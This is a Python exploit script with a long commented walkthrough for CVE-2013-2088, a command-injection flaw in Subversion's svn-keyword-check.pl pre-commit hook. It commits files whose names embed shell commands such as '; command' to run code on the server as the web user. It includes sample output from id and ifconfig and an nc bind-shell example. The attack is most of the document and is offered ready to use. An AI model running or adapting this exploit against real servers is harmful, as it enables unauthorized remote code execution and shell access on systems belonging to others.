Subversion 1.6.6 / 1.6.12 Code Execution

`# This is an exploit for the subversion vulnerability published as CVE-2013-2088.  
  
# Author: GlacierZ0ne ([email protected])  
# Exploit Type: Code Execution  
# Access Type: Authenticated Remote Exploit  
# Prerequisites: svn command line client available,  
# subversion server exposes webdav through apache,  
# user/password with commit privilege  
  
# The exploit has been tested with the following software:  
  
# * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit  
# * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit  
# * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit  
  
# The following conditions need to be met in order for this to work:  
  
# The pre-commit script svn-keyword-check.pl needs to be configured as  
# pre-commit hook. The version shipped with the subversion 1.6.6 contains  
# a bug which prevents it from being used at all. This bug must be fixed  
# (otherwise neither the exploit, nor the intented purpose of the script  
# will work)  
# This perl script can be downloaded from the archive source distribution  
# at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23  
# are vulnerable.  
  
# ###############################################################  
  
# 1. configure the pre-commit hook to use svn-keyword-check.pl  
  
# ###############################################################  
# Copy the svn-keyword-check.pl from the source distribution to the  
# /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl  
# to pre-commit. Make sure both files are owned by the user running  
# apache (e.g. www-data) and have the executable flag set:  
#  
# notroot@ubuntu:/$ cd /svn/repositories/testrepo/hooks  
# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit  
# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit  
# notroot@ubuntu:/svn/repos/testrepo/hooks$ ls -al  
# total 76  
# drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 .  
# drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 ..  
# -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl  
# -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl  
# -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl  
# -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl  
# -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit  
# -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl  
# -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl  
# -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl  
# -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl  
# -rw-r--r-- 1 www-data www-data 2830 2016-09-05 15:23 start-commit.tmpl  
# -rwxr-xr-x 1 www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl  
# notroot@ubuntu:/svn/repos/testrepo/hooks$   
  
# According to the subversion documentation, svn-keyword-check.pl needs  
# to be called by pre-commit. svn-keyword-check.pl will return 1 if it  
# detects something that should prevent the commit. In that case, the  
# subversion server will cancel the commit. Here's how pre-commit looked  
# on my test server:  
  
# notroot@ubuntu:/svn/repos/testrepo/hooks$ cat pre-commit  
# #!/bin/sh  
  
# REPOS="$1"  
# TXN="$2"  
  
# # Make sure that the log message contains some text.  
# #jSVNLOOK=/usr/bin/svnlook  
# $SVNLOOK log -t "$TXN" "$REPOS" | \  
# ep "[a-zA-Z0-9]" > /dev/null || exit 1  
#   
# # Exit on all errors.  
# set -e  
#   
# # Check the files that are are listed in "svnlook changed" (except deleted  
# # files) for possible problems with svn:keywords set on binary files.  
# "$REPOS"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN  
# #  
# #  
# #  
#   
# # All checks passed, so allow the commit.  
# exit 0  
#   
# ###############################################################  
#   
# 2. fix the bug in svn-keyword-check.pl  
#   
# ###############################################################  
# The script pre-commit will pass on repository and transaction to  
# the script svn-keyword-check.pl. Alternatively, it also accepts  
# repository and revision. However, specifying both transaction  
# and revision is illegal, only one of them is considered legal.  
# This reflects in the input parameter plausibility check  
# performed in line 89:  
#   
# if (defined($transaction) and !defined($revision)) {  
# croak "Can't define both revision and transaction!\n";  
# }  
#   
# Unfortunately, there is an exclamation mark too much. It must  
# be  
#   
# if (defined($transaction) and defined($revision)) {  
# croak "Can't define both revision and transaction!\n";  
# }  
#   
# The way this script is shipped in the 1.6.6 source distribution  
# no commit is possible at all.  
#   
# Before using the exploit you should first commit one file  
# manually so that the svn client can store your user/password  
# locally.  
#   
# Then, open a shell and navigate to the directory of your project  
# and start python cve-2013-2088-1.py <command>:  
#  
# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig  
# [+] Randfilename is mJHeSkya  
# [+] Created random file  
# [+] Submitted random file to version control  
# [+] Created fake file for cmd execution  
# [+] Exploit seems to work:   
#  
# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a   
# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0  
# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link  
# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1  
# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0  
# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0  
# collisions:0 txqueuelen:1000   
# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB)  
#  
# lo Link encap:Local Loopback   
# inet addr:127.0.0.1 Mask:255.0.0.0  
# inet6 addr: ::1/128 Scope:Host  
# UP LOOPBACK RUNNING MTU:16436 Metric:1  
# RX packets:0 errors:0 dropped:0 overruns:0 frame:0  
# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0  
# collisions:0 txqueuelen:0   
# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)  
#  
# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py id  
# [+] Randfilename is WmolHiuv  
# [+] Created random file  
# [+] Submitted random file to version control  
# [+] Created fake file for cmd execution  
# [+] Exploit seems to work:   
#  
# uid=33(www-data) gid=33(www-data) groups=33(www-data)  
#  
#  
# Important things to notice  
  
# * For each command execution the exploit will put a file under  
# version control. If you submit a lot of commands you will  
# create a lot of files with random 8 alphanumeric character  
# file names in your repository.  
# * Your command must not contain a / since file names must not  
# contain a /. In the author's test environment the current  
# working directory of apache was the root folder /.  
# Therefore, the exploit will replace / in the command with  
# $(pwd). This worked fine for the author.  
# In your environment this might be different. As first thing  
# execute $(pwd) in order to check if this works for you, too.  
# * The command execution assumes that your command prints something  
# to the terminal and exits. If you know your command will not  
# immediately terminate (e.g. because you're starting a reverse/  
# bind shell), provide the -d or --dont-terminate flag:  
# python svn_exploit2.py -d "/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe"  
#  
#  
#  
import sys  
import subprocess  
import argparse  
import random  
import os  
  
if __name__ == "__main__":  
  
lowerupper = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"  
slash_replacement = "$(pwd)"   
cwd = os.getcwd()  
  
parser = argparse.ArgumentParser (usage="python {} [options] command".format (sys.argv [0]),  
epilog="\x0a\x0a")  
  
parser.add_argument (dest="command", help="Command to execute")  
parser.add_argument ("-d", "--dont-terminate", help="don't force output be sent back to the client. Useful for reverse shell connections.",  
action="store_true")  
  
#  
# args handling  
#  
if (len(sys.argv) <= 1):  
parser.print_help ()  
sys.exit (0)  
  
args = parser.parse_args ()  
if not args.command:  
parser.print_help ()  
sys.exit (0)  
  
#  
# / cannot be used in the command because svn will interprete it as  
# file separator. Therefore you have to use a workaround. Here,  
# $(pwd) works great for us.  
#  
command = args.command  
if command.find ("/") != -1:  
command = command.replace("/", slash_replacement)  
  
#  
# prepare output files for stdout, stderr  
#  
sout = open ("stdout", "w+")  
serr = open ("stderr", "w+")  
  
randfilename = ""  
for idx in range (0, 8):  
randfilename = randfilename + lowerupper [random.randint (0,51)]  
  
print ("[+] Randfilename is {}".format(randfilename))  
  
f = open (randfilename, "w+")  
f.write ("You've been pwned by GlacierZ0ne'") # write 4  
f.flush ()  
f.close ()  
  
p = subprocess.Popen (["svn", "add", "./{randfilename}".format (randfilename=randfilename)],  
stdout=subprocess.PIPE, stderr=subprocess.PIPE)   
c = p.communicate ()  
sout.write (c[0])  
if len(c[1]) > 0:  
print ("[-] Create random file failed:")  
print (c[1])  
sys.exit (0)  
print ("[+] Created random file")  
  
p = subprocess.Popen (["svn", "commit", "-m", "I pwned you", "./{randfilename}".format (randfilename=randfilename)],  
stdout=subprocess.PIPE, stderr=subprocess.PIPE)  
c = p.communicate ()  
sout.write (c[0])  
if len(c[1]) > 0:  
print ("[-] Submission of random file failed:")  
print (c[1])  
sys.exit (0)  
print ("[+] Submitted random file to version control")  
  
fakefilename = None  
if args.dont_terminate == True:  
fakefilename = "{}; {}".format (randfilename, command)  
else:  
fakefilename = "{}; {} 1>&2; exit 1".format (randfilename, command)  
f = open (fakefilename, "w+")  
f.write ("You've been pwned by GlacierZ0ne") # write 4  
f.flush ()  
f.close ()  
  
p = subprocess.Popen (["svn", "add", "{fakefilename}"  
.format (cwd=cwd, fakefilename=fakefilename)],  
stdout=subprocess.PIPE, stderr=subprocess.PIPE)   
c = p.communicate ()  
sout.write (c[0])  
if len(c[1]) > 0:  
print ("[-] Creation of fake file failed:")  
print (c[1])  
sys.exit (0)  
print ("[+] Created fake file for cmd execution")  
  
p = subprocess.Popen (["svn", "commit", "-m", "I pwned you", "{fakefilename}"  
.format (cwd=cwd, fakefilename=fakefilename)],  
stdout=subprocess.PIPE, stderr=subprocess.PIPE)  
c = p.communicate ()  
sout.write (c[0])  
if len(c[1]) == 0:  
if not args.dont_terminate:  
print "[-] Something went wrong, pre-commit hook didn't kick in."  
else:  
print "[!] Done"  
sys.exit (0)  
else:  
idx0= c[1].find ("Commit blocked by pre-commit hook")  
idx = c[1].find ("failed with this output")  
  
if idx0 != -1 and idx != -1:  
print ("[+] Exploit seems to work: ")  
print (c[1][idx + len("failed with this output") + 1:])  
  
sout.flush ()  
sout.close ()  
serr.flush ()  
serr.close ()  
  
  
`